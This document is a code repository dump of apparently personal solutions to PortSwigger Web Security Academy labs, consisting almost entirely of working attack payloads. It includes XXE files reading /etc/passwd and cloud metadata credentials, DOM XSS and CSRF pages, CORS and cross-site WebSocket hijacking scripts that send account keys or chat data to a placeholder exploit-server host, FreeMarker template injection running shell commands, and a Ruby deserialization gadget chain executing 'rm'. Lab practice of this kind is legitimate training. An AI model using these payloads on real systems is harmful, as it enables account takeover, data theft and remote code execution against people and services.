├── .gitignore
├── Portswigger.png
├── Portswigger2.png
├── FileUpload
    ├── out.php
    └── README.md
├── XXE
    ├── output-lab08.png
    ├── payload07.xml
    ├── payload03.xml
    ├── payload04.xml
    ├── payload01.xml
    ├── payload05.xml
    ├── payload02.xml
    ├── payload06.xml
    ├── payload08.svg
    ├── payload09.xml
    ├── exploit-lab07.py
    ├── README.md
    ├── exploit-lab01.py
    ├── exploit-lab02.py
    ├── exploit-lab03.py
    ├── exploit-lab04.py
    └── exploit-lab09.py
├── DOMBasedXSS
    ├── payload06.html
    ├── payload07.html
    ├── payload02.html
    ├── payload01.html
    ├── payload04.html
    ├── payload03.html
    ├── payload05.html
    └── README.md
├── InsecureDeserialization
    ├── out.jpg
    └── deserial.rb
├── JWT
    ├── pkcs1.asn
    ├── x509.asn
    └── README.md
├── SSTI
    ├── payload2.java
    ├── payload1.java
    ├── README.md
    └── exploit-lab01.py
├── requirements.txt
├── BusinessLogic
    └── exploit-lab12.py
├── CSRF
    ├── payload08.html
    ├── payload09.html
    ├── payload07.html
    ├── payload02.html
    ├── payload01.html
    ├── payload03.html
    ├── payload04.html
    ├── payload11.html
    ├── payload12.html
    ├── payload10.html
    ├── payload06.html
    └── payload05.html
├── EssentialSkills
    ├── README.md
    └── exploit-lab01.py
├── CORS
    ├── payload01.html
    ├── payload03.html
    ├── payload02.html
    └── README.md
├── ClickJacking
    ├── payload02.html
    ├── payload03.html
    ├── payload04.html
    ├── payload01.html
    ├── test.html
    ├── payload05.html
    └── README.md
├── Websockets
    ├── README.md
    ├── exploit-lab01.py
    └── exploit-lab03.py
├── NoSQL
    ├── README.md
    └── exploit-lab02.py
├── Authentication
    ├── usernames.txt
    ├── passwords.txt
    ├── exploit-lab13.py
    └── exploit-lab09.py
├── GraphQL
    └── README.md
├── OSCommandInjection
    ├── README.md
    ├── exploit-lab01.py
    └── exploit-lab04.py
├── InformationDisclosure
    ├── README.md
    ├── exploit-lab02.py
    ├── exploit-lab01.py
    └── exploit-lab04.py
├── APITesting
    └── README.md
├── OAuth
    └── README.md
├── DirectoryTraversal
    ├── README.md
    ├── exploit-lab01.py
    ├── exploit-lab05.py
    ├── exploit-lab03.py
    ├── exploit-lab02.py
    ├── exploit-lab06.py
    └── exploit-lab04.py
├── SSRF
    ├── README.md
    ├── exploit-lab03.py
    ├── exploit-lab06.py
    ├── exploit-lab05.py
    └── exploit-lab01.py
├── HostHeader
    └── README.md
├── XSS
    ├── exploit-lab01.py
    ├── exploit-lab17.py
    ├── exploit-lab12.py
    ├── exploit-lab11.py
    ├── exploit-lab04.py
    ├── exploit-lab16.py
    ├── exploit-lab09.py
    ├── exploit-lab03.py
    ├── exploit-lab07.py
    ├── exploit-lab30.py
    ├── exploit-lab05.py
    ├── exploit-lab28.py
    ├── exploit-lab18.py
    ├── exploit-lab27.py
    ├── exploit-lab10.py
    ├── exploit-lab25.py
    ├── exploit-lab19.py
    ├── exploit-lab21.py
    └── exploit-lab02.py
├── SQLInjection
    ├── exploit-lab07.py
    ├── exploit-lab01.py
    ├── exploit-lab14.py
    ├── exploit-lab16.py
    └── exploit-lab02.py
├── WebCachePoisoning
    ├── exploit-lab02.py
    ├── exploit-lab05.py
    └── exploit-lab06.py
└── PrototypePollution
    └── exploit-lab01.py


/.gitignore:
--------------------------------------------------------------------------------
1 | notes.txt
2 | *.zip
3 | */__pycache__
4 | JWT/*.pem
5 | 


--------------------------------------------------------------------------------
/Portswigger.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gwyomarch/WebSecurityAcademy/HEAD/Portswigger.png


--------------------------------------------------------------------------------
/Portswigger2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gwyomarch/WebSecurityAcademy/HEAD/Portswigger2.png


--------------------------------------------------------------------------------
/FileUpload/out.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gwyomarch/WebSecurityAcademy/HEAD/FileUpload/out.php


--------------------------------------------------------------------------------
/XXE/output-lab08.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gwyomarch/WebSecurityAcademy/HEAD/XXE/output-lab08.png


--------------------------------------------------------------------------------
/DOMBasedXSS/payload06.html:
--------------------------------------------------------------------------------
1 | <a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(1)//">


--------------------------------------------------------------------------------
/InsecureDeserialization/out.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gwyomarch/WebSecurityAcademy/HEAD/InsecureDeserialization/out.jpg


--------------------------------------------------------------------------------
/XXE/payload07.xml:
--------------------------------------------------------------------------------
1 | <foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>
2 | 


--------------------------------------------------------------------------------
/XXE/payload03.xml:
--------------------------------------------------------------------------------
1 | <!DOCTYPE stockCheck [<!ENTITY xxe SYSTEM "http://anything.oastify.com">]><stockCheck><productId>&xxe;</productId><storeId>2</storeId></stockCheck>


--------------------------------------------------------------------------------
/XXE/payload04.xml:
--------------------------------------------------------------------------------
1 | <!DOCTYPE Gwyo [<!ENTITY % xxe SYSTEM "http://anything.oastify.com"> %xxe; ] ><stockCheck><productId>1</productId><storeId>2</storeId></stockCheck>


--------------------------------------------------------------------------------
/DOMBasedXSS/payload07.html:
--------------------------------------------------------------------------------
1 | <iframe src=https://xxxxxxxxxxxxxxURLxxxxxxxxxxxxxxx.web-security-academy.net/post?postId=6 onload="setTimeout(()=>this.src=this.src+'#g',500)">


--------------------------------------------------------------------------------
/JWT/pkcs1.asn:
--------------------------------------------------------------------------------
1 | PKCS1 DEFINITIONS ::= BEGIN
2 | 
3 |   RSAPublicKey ::= SEQUENCE {
4 |     modulus           INTEGER,  
5 |     publicExponent    INTEGER   
6 |   }
7 | 
8 | END


--------------------------------------------------------------------------------
/DOMBasedXSS/payload02.html:
--------------------------------------------------------------------------------
1 | <iframe src="https://xxxxxxxxxxxxxxURLxxxxxxxxxxxxxxx.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:print();//http:', '*')" />


--------------------------------------------------------------------------------
/SSTI/payload2.java:
--------------------------------------------------------------------------------
1 | ${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve("/home/carlos/my_password.txt").toURL().openStream().readAllBytes()?join(" ")}


--------------------------------------------------------------------------------
/DOMBasedXSS/payload01.html:
--------------------------------------------------------------------------------
1 | </div><iframe src="https://xxxxxxxxxxxxxxURLxxxxxxxxxxxxxxx.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=x onerror=print() />', '*')" />


--------------------------------------------------------------------------------
/DOMBasedXSS/payload04.html:
--------------------------------------------------------------------------------
1 | <iframe src="https://xxxxxxxxxxxxxxURLxxxxxxxxxxxxxxx.web-security-academy.net/post?postId=1&url=https://exploit-xxxxxxxxxxxATTACKERxxxxxxxxxxxxx.exploit-server.net/"></iframe>


--------------------------------------------------------------------------------
/XXE/payload01.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
3 | <stockCheck><productId>&xxe;</productId><storeId>2</storeId></stockCheck>


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
 1 | beautifulsoup4
 2 | requests
 3 | websocket
 4 | websocket_client
 5 | urllib3
 6 | pytest-shutil
 7 | pytesseract
 8 | jwcrypto
 9 | pycryptodome
10 | asn1tools
11 | gmpy2
12 | lxml
13 | h2


--------------------------------------------------------------------------------
/DOMBasedXSS/payload03.html:
--------------------------------------------------------------------------------
1 | <iframe src="https://xxxxxxxxxxxxxxURLxxxxxxxxxxxxxxx.web-security-academy.net/" onload='this.contentWindow.postMessage("{\"type\":\"load-channel\",\"url\":\"javascript:print()\"}", "*")' />


--------------------------------------------------------------------------------
/XXE/payload05.xml:
--------------------------------------------------------------------------------
1 | <!DOCTYPE Gwyo [ <!ENTITY % xxe SYSTEM "https://exploit-xxxxxxxxxxxxATTACKERxxxxxxxxxxxx.exploit-server.net/exploit.dtd"> %xxe;]><stockCheck><productId>15</productId><storeId>3</storeId></stockCheck>
2 | 


--------------------------------------------------------------------------------
/DOMBasedXSS/payload05.html:
--------------------------------------------------------------------------------
1 | <iframe src="https://xxxxxxxxxxxxxxURLxxxxxxxxxxxxxxx.web-security-academy.net/product?productId=1&'><script>print()</script>" onload="location='https://xxxxxxxxxxxxxxURLxxxxxxxxxxxxxxx.web-security-academy.net/'"></iframe>


--------------------------------------------------------------------------------
/XXE/payload02.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <!DOCTYPE stockCheck [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin">]>
3 | <stockCheck><productId>&xxe;</productId><storeId>2</storeId></stockCheck>


--------------------------------------------------------------------------------
/XXE/payload06.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <!DOCTYPE Gwyo [ <!ENTITY % xxe SYSTEM "https://exploit-xxxxxxxxxxxxATTACKERxxxxxxxxxxxx.exploit-server.net/exploit.dtd"> %xxe;]><stockCheck><productId>15</productId><storeId>3</storeId></stockCheck>


--------------------------------------------------------------------------------
/BusinessLogic/exploit-lab12.py:
--------------------------------------------------------------------------------
1 | # Bypassing access controls using email address parsing discrepancies
2 | 
3 | # https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-bypassing-access-controls-using-email-address-parsing-discrepancies
4 | 
5 | 
6 | # WIP...


--------------------------------------------------------------------------------
/CSRF/payload08.html:
--------------------------------------------------------------------------------
1 | <html>
2 |   <body>
3 |     <script>
4 |       document.location = "https://xxxxxxxxxxxxxxxURLxxxxxxxxxxxxxx.web-security-academy.net/post/comment/confirmation?postId=../my-account/change-email?email=test%40attacker.com%26submit=1";
5 |     </script>
6 |   </body>
7 | </html>


--------------------------------------------------------------------------------
/XXE/payload08.svg:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" standalone="yes"?>
2 | <!DOCTYPE gwyo [ <!ENTITY xxe SYSTEM "file:///etc/hostname" >]>
3 | <svg width="600px" height="200px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/2000/xlink" version="1.1">
4 | 	<text font-family="Verdana" font-size="60" x="40" y="125">
5 | 		&xxe;
6 | 	</text>
7 | </svg>


--------------------------------------------------------------------------------
/SSTI/payload1.java:
--------------------------------------------------------------------------------
1 | <#assign classloader=product.class.protectionDomain.classLoader>
2 | <#assign owc=classloader.loadClass("freemarker.template.ObjectWrapper")>
3 | <#assign dwf=owc.getField("DEFAULT_WRAPPER").get(null)>
4 | <#assign ec=classloader.loadClass("freemarker.template.utility.Execute")>
5 | ${dwf.newInstance(ec,null)("cat /home/carlos/my_password.txt")}</p>
6 | 


--------------------------------------------------------------------------------
/CSRF/payload09.html:
--------------------------------------------------------------------------------
 1 | <script>
 2 | var ws = new WebSocket('wss://xxxxxxxxxxxxxxURLxxxxxxxxxxxxxxx.web-security-academy.net/chat');
 3 | ws.onopen = function() {
 4 |   ws.send("READY");
 5 | }
 6 | ws.onmessage = function(event) {
 7 |   fetch('https://exploit-xxxxxxxxxxxATTACKERxxxxxxxxxxxxx.exploit-server.net/log?data=' + btoa(event.data), {method: 'GET', mode: 'no-cors'});
 8 | }
 9 | </script>
10 | 


--------------------------------------------------------------------------------
/XXE/payload09.xml:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE Gwyo [
 2 | <!ENTITY % local_dtd SYSTEM "file:////usr/share/yelp/dtd/docbookx.dtd">
 3 | <!ENTITY % ISOamso '
 4 | <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
 5 | <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27; file:///nonexistent/&#x25;file;&#x27;>">
 6 | &#x25;eval;
 7 | &#x25;error;
 8 | '>
 9 | %local_dtd;
10 | ]><stockCheck><productId>7</productId><storeId>1</storeId></stockCheck>


--------------------------------------------------------------------------------
/CSRF/payload07.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 | 	<body>
 3 | 		<form action="https://xxxxxxxxxxxxxURLxxxxxxxxxxxxxxxx.web-security-academy.net/my-account/change-email">
 4 | 			<input type="hidden" name="email" value="gwyo&#64;attacker&#46;com" />
 5 | 			<input type="hidden" name="&#95;method" value="POST" />
 6 | 		</form>
 7 | 		<script>
 8 | 			history.pushState('', '', '/');
 9 | 			document.forms[0].submit();
10 |   		</script>
11 | 	</body>
12 | </html>


--------------------------------------------------------------------------------
/EssentialSkills/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | ## Essential Skills
 3 | 
 4 | 
 5 | 
 6 | ### [**Script 01**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/EssentialSkills/exploit-lab01.py)
 7 | 
 8 | Lab: [Discovering vulnerabilities quickly with targeted scanning](https://portswigger.net/web-security/essential-skills/using-burp-scanner-during-manual-testing/lab-discovering-vulnerabilities-quickly-with-targeted-scanning)
 9 | 
10 | Difficulty: PRACTITIONER
11 | 


--------------------------------------------------------------------------------
/CSRF/payload02.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 | 	<body>
 3 | 		<iframe style="display:none" name="csrf-iframe"></iframe>      
 4 | 		<form action="https://xxxxxxxxxxxxxxURLxxxxxxxxxxxxxxx.web-security-academy.net/my-account/change-email" method="GET" target="csrf-iframe" id="csrf-form">
 5 | 			<input type="hidden" name="email" value="test@attacker.com" />
 6 | 		</form>
 7 | 		<script>
 8 | 			document.getElementById('csrf-form').submit();
 9 | 		</script>
10 | 	</body>
11 | </html>


--------------------------------------------------------------------------------
/CSRF/payload01.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 | 	<body>
 3 | 		<iframe style="display:none" name="csrf-iframe"></iframe>      
 4 | 		<form action="https://xxxxxxxxxxxxxxURLxxxxxxxxxxxxxxx.web-security-academy.net/my-account/change-email" method="POST" target="csrf-iframe" id="csrf-form">
 5 | 			<input type="hidden" name="email" value="test@attacker.com" />
 6 | 		</form>
 7 | 		<script>
 8 | 			document.getElementById('csrf-form').submit();
 9 | 		</script>
10 | 	</body>
11 | </html>


--------------------------------------------------------------------------------
/CSRF/payload03.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 | 	<body>
 3 | 		<iframe style="display:none" name="csrf-iframe"></iframe>      
 4 | 		<form action="https://xxxxxxxxxxxxxxURLxxxxxxxxxxxxxxx.web-security-academy.net/my-account/change-email" method="POST" target="csrf-iframe" id="csrf-form">
 5 | 			<input type="hidden" name="email" value="test@attacker.com" />
 6 | 		</form>
 7 | 		<script>
 8 | 			document.getElementById('csrf-form').submit();
 9 | 		</script>
10 | 	</body>
11 | </html>


--------------------------------------------------------------------------------
/CORS/payload01.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <body>
 3 | 	<script>
 4 | 		const xhr = new XMLHttpRequest();
 5 | 		const url = "https://xxxxxxxxxxxxxxURLxxxxxxxxxxxxxxx.web-security-academy.net";
 6 | 		xhr.onreadystatechange = () => {
 7 | 			if(xhr.readyState == XMLHttpRequest.DONE) {
 8 | 				fetch("/log?apiKey=" + xhr.responseText);
 9 | 			}
10 | 		};
11 | 		xhr.open('GET', url + '/accountDetails', true);
12 | 		xhr.withCredentials = true;
13 | 		xhr.send(null);
14 | 	</script>
15 | </body>
16 | </html>


--------------------------------------------------------------------------------
/JWT/x509.asn:
--------------------------------------------------------------------------------
 1 | PKCS8 DEFINITIONS ::= BEGIN
 2 | 
 3 | PublicKeyInfo ::= SEQUENCE {
 4 |    publicKeyAlgorithm PrivateKeyAlgorithmIdentifier, -- for some reason I can't comprehend this only works with "Private"
 5 |    publicKey BIT STRING
 6 | }
 7 | 
 8 | 
 9 | 
10 | 
11 | Version ::= INTEGER
12 | 
13 | PrivateKeyAlgorithmIdentifier ::= AlgorithmIdentifier
14 | 
15 | 
16 | AlgorithmIdentifier ::= SEQUENCE {
17 |     algorithm       OBJECT IDENTIFIER,
18 |     parameters      NULL
19 | }
20 | 
21 | 
22 | END


--------------------------------------------------------------------------------
/CORS/payload03.html:
--------------------------------------------------------------------------------
1 | <script>
2 | 	document.location="http://stock.xxxxxxxxxxxxxxURLxxxxxxxxxxxxxxx.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://xxxxxxxxxxxxxxURLxxxxxxxxxxxxxxx.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://exploit-xxxxxxxxxxxxATTACKERxxxxxxxxxxxx.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
3 | </script>


--------------------------------------------------------------------------------
/ClickJacking/payload02.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <head>
 3 | <style>
 4 | 	iframe {
 5 | 		position:relative;
 6 | 		width: 500px;
 7 | 		height: 700px;
 8 | 		opacity: .0001;
 9 | 		z-index: 2;
10 | 	}
11 | 	div {
12 | 		position:absolute;
13 | 		top: 460px;
14 | 		left: 80px;
15 | 		z-index: 1;
16 | 	}
17 | </style>
18 | </head>
19 | <body>
20 | <div>Click me</div>
21 | <iframe src="https://xxxxxxxxxxxxxxURLxxxxxxxxxxxxxxx.web-security-academy.net/my-account?email=test@attacker.com"></iframe>
22 | </body>
23 | </html>
24 | 


--------------------------------------------------------------------------------
/ClickJacking/payload03.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <head>
 3 | <style>
 4 | 	iframe {
 5 | 		position:relative;
 6 | 		width: 700px;
 7 | 		height: 500px;
 8 | 		opacity: .0001;
 9 | 		z-index: 2;
10 | 	}
11 | 	div {
12 | 		position:absolute;
13 | 		top: 460px;
14 | 		left: 75px;
15 | 		z-index: 1;
16 | 	}
17 | </style>
18 | </head>
19 | <body>
20 | <div>Click me</div>
21 | <iframe src="https://xxxxxxxxxxxxxxURLxxxxxxxxxxxxxxx.web-security-academy.net/my-account?email=test@attacker.com" sandbox="allow-forms"></iframe>
22 | </body>
23 | </html>
24 | 


--------------------------------------------------------------------------------
/CSRF/payload04.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 | 	<body>
 3 | 		<iframe style="display:none" name="csrf-iframe"></iframe>      
 4 | 		<form action="https://xxxxxxxxxxxxxURLxxxxxxxxxxxxxxxx.web-security-academy.net/my-account/change-email" method="POST" target="csrf-iframe" id="csrf-form">
 5 | 			<input type="hidden" name="email" value="test@attacker.com" />
 6 | 			<input type="hidden" name="csrf" value="xxxxxxxxxxxxxxCSRFxxxxxxxxxxxxxx" />
 7 | 		</form>
 8 | 		<script>
 9 | 			document.getElementById('csrf-form').submit();
10 | 		</script>
11 | 	</body>
12 | </html>


--------------------------------------------------------------------------------
/CSRF/payload11.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <head>
 3 |     <meta name="referrer" content="no-referrer">
 4 |   </head>
 5 |   <body>
 6 |     <iframe style="display:none" name="csrf-iframe"></iframe>
 7 |     <form action="https://xxxxxxxxxxxxxxURLxxxxxxxxxxxxxxx.web-security-academy.net/my-account/change-email" method="POST" target="csrf-iframe">
 8 |       <input type="hidden" name="email" value="test@attacker.com" />
 9 |     </form>
10 |     <script>
11 |       history.pushState('', '', '/');
12 |       document.forms[0].submit();
13 |     </script>
14 |   </body>
15 | </html>


--------------------------------------------------------------------------------
/CORS/payload02.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <body>
 3 | 	<iframe style="display:none" sandbox="allow-scripts" srcdoc="
 4 | 	<script>
 5 | 		const xhr = new XMLHttpRequest();
 6 | 		const url = 'https://xxxxxxxxxxxxxxURLxxxxxxxxxxxxxxx.web-security-academy.net';
 7 | 		xhr.onreadystatechange = () => {
 8 | 			if(xhr.readyState == XMLHttpRequest.DONE) {
 9 | 				fetch('/log?key=' + xhr.responseText);
10 | 			}
11 | 		};
12 | 		xhr.open('GET', url + '/accountDetails', true);
13 | 		xhr.withCredentials = true;
14 | 		xhr.send(null);
15 | 	</script>
16 | 	"></iframe>
17 | </body>
18 | </html>
19 | 


--------------------------------------------------------------------------------
/ClickJacking/payload04.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <head>
 3 | <style>
 4 | 	iframe {
 5 | 		position:relative;
 6 | 		width: 700px;
 7 | 		height: 1000px;
 8 | 		opacity: .0001;
 9 | 		z-index: 2;
10 | 	}
11 | 	div {
12 | 		position:absolute;
13 | 		top: 792px;
14 | 		left: 75px;
15 | 		z-index: 1;
16 | 	}
17 | </style>
18 | </head>
19 | <body>
20 | <div>Click me</div>
21 | <iframe src="https://xxxxxxxxxxxxxxURLxxxxxxxxxxxxxxx.web-security-academy.net/feedback/?name=<img src=1 onerror=print()>&email=test%40attacker.com&subject=test&message=test#feedbackResult"></iframe>
22 | </body>
23 | </html>
24 | 


--------------------------------------------------------------------------------
/CSRF/payload12.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <body>
 3 |     <script>
 4 |       history.pushState('', '', '/?xxxxxxxxxxxxxxxURLxxxxxxxxxxxxxx.web-security-academy.net');
 5 |     </script>
 6 |     <iframe style="display:none" name="csrf-iframe"></iframe>
 7 |     <form action="https://xxxxxxxxxxxxxxxURLxxxxxxxxxxxxxx.web-security-academy.net/my-account/change-email" method="POST" id="csrf-form" target="csrf-iframe">
 8 |       <input type="hidden" name="email" value="test@attacker.com" />
 9 |     </form>
10 |     <script>
11 |       document.getElementById('csrf-form').submit();
12 |     </script>
13 |   </body>
14 | </html>


--------------------------------------------------------------------------------
/CSRF/payload10.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <body>
 3 |     <form action="https://xxxxxxxxxxxxxxURLxxxxxxxxxxxxxxx.web-security-academy.net/my-account/change-email" method="POST">
 4 |       <input type="hidden" name="email" value="test@attacker.com" />
 5 |     </form>
 6 |     <script>
 7 |     const submitForm = () => {
 8 |       document.forms[0].submit();
 9 |       history.pushState('', '', '/');
10 |     };
11 |     window.onclick = () => {
12 |       window.open('https://xxxxxxxxxxxxxxURLxxxxxxxxxxxxxxx.web-security-academy.net/social-login');
13 |       setTimeout(() => submitForm(), 5000);
14 |     }
15 |     </script>
16 |   </body>
17 | </html>


--------------------------------------------------------------------------------
/ClickJacking/payload01.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 | <head>
 4 | 	<style>
 5 | 		#target-website {
 6 | 			position: relative;
 7 | 			width: 500px;
 8 | 			height: 700px;
 9 | 			opacity: .0001;
10 | 			z-index: 2;
11 | 		}
12 | 		#cta-website {
13 | 			position: absolute;
14 | 			width: 300px;
15 | 			height: 400px;
16 | 			z-index: 1;
17 | 			top: 495px;
18 | 			left: 77px;
19 | 		}
20 | 	</style>
21 | </head>
22 | <body>
23 | 	<div id="cta-website">
24 | 		<button class="button" type="submit">click me</button>
25 | 	</div>
26 | 	<iframe src="https://xxxxxxxxxxxxxxURLxxxxxxxxxxxxxxx.web-security-academy.net/my-account" frameborder="0" id="target-website"></iframe>
27 | </body>
28 | </html>
29 | 
30 | 


--------------------------------------------------------------------------------
/CSRF/payload06.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 | 	<body>
 3 | 		<iframe style="display:none" name="csrf-iframe"></iframe>      
 4 | 		<form action="https://xxxxxxxxxxxxxxURLxxxxxxxxxxxxxxx.web-security-academy.net/my-account/change-email" method="POST" target="csrf-iframe" id="csrf-form">
 5 | 			<input type="hidden" name="email" value="test@attacker.com" />
 6 | 			<input type="hidden" name="csrf" value="xxxxxxxxxxxxxxCSRFxxxxxxxxxxxxxx" />
 7 | 		</form>
 8 | 		<img src="https://xxxxxxxxxxxxxxURLxxxxxxxxxxxxxxx.web-security-academy.net/?search=%0d%0aSet-Cookie:%20csrf=xxxxxxxxxxxxxxCSRFxxxxxxxxxxxxxx%3b%20SameSite=None" onerror="document.forms[0].submit()" />
 9 | 		<script>
10 | 			document.getElementById('csrf-form').submit();
11 | 		</script>
12 | 	</body>
13 | </html>


--------------------------------------------------------------------------------
/CSRF/payload05.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 | 	<body>
 3 | 		<iframe style="display:none" name="csrf-iframe"></iframe>      
 4 | 		<form action="https://xxxxxxxxxxxxxxxURLxxxxxxxxxxxxxx.web-security-academy.net/my-account/change-email" method="POST" target="csrf-iframe" id="csrf-form">
 5 | 			<input type="hidden" name="email" value="test@attacker.com" />
 6 | 			<input type="hidden" name="csrf" value="xxxxxxxxxxxxxxCSRFxxxxxxxxxxxxxx" />
 7 | 		</form>
 8 | 		<img src="https://xxxxxxxxxxxxxxxURLxxxxxxxxxxxxxx.web-security-academy.net/?search=%0d%0aSet-Cookie:%20csrfKey=xxxxxxxxxxxxCSRFKEYxxxxxxxxxxxxx%3b%20SameSite=None" onerror="document.forms[0].submit()" />
 9 | 		<script>
10 | 			document.getElementById('csrf-form').submit();
11 | 		</script>
12 | 	</body>
13 | </html>


--------------------------------------------------------------------------------
/ClickJacking/test.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 | <head>
 4 | 	<style>
 5 | 		#target-website {
 6 | 			position: relative;
 7 | 			width: 1000px;
 8 | 			height: 800px;
 9 | 			opacity: 0.7;
10 | 			z-index: 2;
11 | 		}
12 | 		#cta-website1 {
13 | 			position: absolute;
14 | 			z-index: 1;
15 | 			top: 515px;
16 | 			left: 55px;
17 | 		}
18 | 		#cta-website2 {
19 | 			position: absolute;
20 | 			z-index: 1;  
21 | 			top: 310px;
22 | 			left: 200px;
23 | 		}
24 | 	</style>
25 | </head>
26 | <body>
27 | 	<div id="cta-website1">Click me first!</div>
28 | 	<div id="cta-website2">Click me next!</div>
29 | 	<iframe src="https://0a9a008b049f9255807044a0009700a0.web-security-academy.net/my-account" id="target-website"></iframe>
30 | </body>
31 | </html>
32 | 


--------------------------------------------------------------------------------
/ClickJacking/payload05.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 | <head>
 4 | 	<style>
 5 | 		#target-website {
 6 | 			position: relative;
 7 | 			width: 800px;
 8 | 			height: 600px;
 9 | 			opacity: .0001;
10 | 			z-index: 2;
11 | 		}
12 | 		#cta-website1 {
13 | 			position: absolute;
14 | 			width: 300px;
15 | 			height: 400px;
16 | 			z-index: 1;
17 | 			top: 498px;
18 | 			left: 77px;
19 | 		}
20 | 		#cta-website2 {
21 | 			position: absolute;
22 | 			width: 300px;
23 | 			height: 400px;
24 | 			z-index: 1;
25 | 			top: 295px;
26 | 			left: 160px;
27 | 		}
28 | 	</style>
29 | </head>
30 | <body>
31 | 	<div id="cta-website1">
32 | 		<button class="button" type="submit">Click me first</button>
33 | 	</div>
34 | 	<div id="cta-website2">
35 | 		<button class="button" type="submit">Click me next</button>
36 | 	</div>
37 | 	<iframe src="https://xxxxxxxxxxxxxxURLxxxxxxxxxxxxxxx.web-security-academy.net/my-account" frameborder="0" id="target-website" sandbox="allow-forms"></iframe>
38 | </body>
39 | </html>
40 | 


--------------------------------------------------------------------------------
/Websockets/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | ## Websockets
 4 | 
 5 | 
 6 | 
 7 | ### [**Script 01**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/Websockets/exploit-lab01.py)
 8 | 
 9 | Lab: [Manipulating WebSocket messages to exploit vulnerabilities](https://portswigger.net/web-security/websockets/lab-manipulating-messages-to-exploit-vulnerabilities)
10 | 
11 | Difficulty: APPRENTICE
12 | 
13 | 
14 | ### [**Script 02**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/Websockets/exploit-lab02.py)
15 | 
16 | Lab: [Cross-site WebSocket hijacking](https://portswigger.net/web-security/websockets/cross-site-websocket-hijacking/lab)
17 | 
18 | Difficulty: PRACTITIONER
19 | 
20 | 
21 | ### [**Script 03**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/Websockets/exploit-lab03.py)
22 | 
23 | Lab: [Manipulating the WebSocket handshake to exploit vulnerabilities](https://portswigger.net/web-security/websockets/lab-manipulating-handshake-to-exploit-vulnerabilities)
24 | 
25 | Difficulty: PRACTITIONER
26 | 
27 | 
28 | 


--------------------------------------------------------------------------------
/InsecureDeserialization/deserial.rb:
--------------------------------------------------------------------------------
 1 | # Autoload the required classes
 2 | Gem::SpecFetcher
 3 | Gem::Installer
 4 | 
 5 | # prevent the payload from running when we Marshal.dump it
 6 | module Gem
 7 |   class Requirement
 8 |     def marshal_dump
 9 |       [@requirements]
10 |     end
11 |   end
12 | end
13 | 
14 | wa1 = Net::WriteAdapter.new(Kernel, :system)
15 | 
16 | rs = Gem::RequestSet.allocate
17 | rs.instance_variable_set('@sets', wa1)
18 | rs.instance_variable_set('@git_set', "rm /home/carlos/morale.txt")
19 | 
20 | wa2 = Net::WriteAdapter.new(rs, :resolve)
21 | 
22 | i = Gem::Package::TarReader::Entry.allocate
23 | i.instance_variable_set('@read', 0)
24 | i.instance_variable_set('@header', "aaa")
25 | 
26 | n = Net::BufferedIO.allocate
27 | n.instance_variable_set('@io', i)
28 | n.instance_variable_set('@debug_output', wa2)
29 | 
30 | t = Gem::Package::TarReader.allocate
31 | t.instance_variable_set('@io', n)
32 | 
33 | r = Gem::Requirement.allocate
34 | r.instance_variable_set('@requirements', t)
35 | 
36 | payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])
37 | puts Base64.encode64(payload)
38 | 


--------------------------------------------------------------------------------
/CORS/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | ## CORS
 3 | 
 4 | 
 5 | ### [**Script 01**](https://github.com/gwyomarch/WebSecurityAcademy/blob/main/CORS/exploit-lab01.py)
 6 | 
